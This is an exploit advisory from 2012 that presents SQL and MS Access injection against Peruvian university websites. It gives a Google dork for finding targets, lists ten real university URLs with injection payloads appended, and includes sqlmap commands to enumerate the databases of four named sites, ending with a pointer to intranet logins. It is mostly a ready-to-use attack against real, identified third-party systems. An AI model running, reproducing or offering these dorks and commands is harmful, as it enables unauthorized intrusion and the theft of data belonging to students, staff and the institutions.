+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# Exploit Title : Peruvian Universities - MS Access/SQL Injection Vulnerabilities
# Date		: 16-11-2012
# Author	: Caleb Bucker (Independent Security Researcher)
# Contact	: https://twitter.com/CalebDrugs
# Website	: www.calebbucker.blogspot.com
# Category	: WebApps
# Google Dork	: ".php?id= site:edu.pe" or ".asp?id= site:edu.pe"
# Tested on: 	: BackTrack 5 R3
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] ANALIZING:

# http://www.site-web.edu.pe/[PATH].php?id='		     [SQL Injection]
# http://www.site-web.edu.pe/[PATH].asp?id='		     [MS Access Injection]
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] DETECTING VULNERABILITY:

# You have an error in your SQL syntax;		             [SQL Injection]
# Microsoft OLE DB Provider for SQL Server error '80040e14'  [MS Access Injection]
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] VULNERABLE FILES:

# noticias.php? 	detalle.asp?		index.php?	interno.php?
# informacion.php?	egresados.php?		contacto.php?	encuesta.asp?
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] EXAMPLE SITES VULNERABLE:

# http://www.uap.edu.pe/convenios/detalle.asp?cod=1'
# http://www.umch.edu.pe/interno.php?id=46'
# http://www.utp.edu.pe/noticias.aspx?idNoti=1'
# http://www.ipp.edu.pe/listado.php?cat=1'
# http://www.udch.edu.pe/web/egresados.php?e=1'
# http://www.cientifica.edu.pe/noticias/noticias.asp?id=1327'
# http://www1.up.edu.pe/servicios/sitios/contacto.php?id=3'
# http://www.sistemasuni.edu.pe/encuesta/encuesta.asp?id_encuesta=372&pregunta=1'
# http://envivo.universia.edu.pe/detalle_empleo.php?id=8608'
# http://www.pucp.edu.pe/content/pagina14.php?pIDSeccionWeb=6&pID=915'
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] EXPLOITING SITES VULNERABLE WITH SQLMAP:

# ./sqlmap.py -u http://www.uap.edu.pe/convenios/detalle.asp?cod=1 --dbs
# ./sqlmap.py -u http://www.cientifica.edu.pe/noticias/noticias.asp?id=1327 --dbs
# ./sqlmap.py -u "http://www.sistemasuni.edu.pe/encuesta/encuesta.asp?id_encuesta=372&pregunta=1" -p "pregunta" --dbs
# ./sqlmap.py -u "http://www.pucp.edu.pe/content/pagina14.php?pIDSeccionWeb=6&pID=915" -p "pID" --dbs
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] ACCESS INTRANET - LOGIN:

# http://www.site-web.edu.pe/intranet/
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

# Greet'z | @Pwnakil | @CLsecurity2011 & All my friend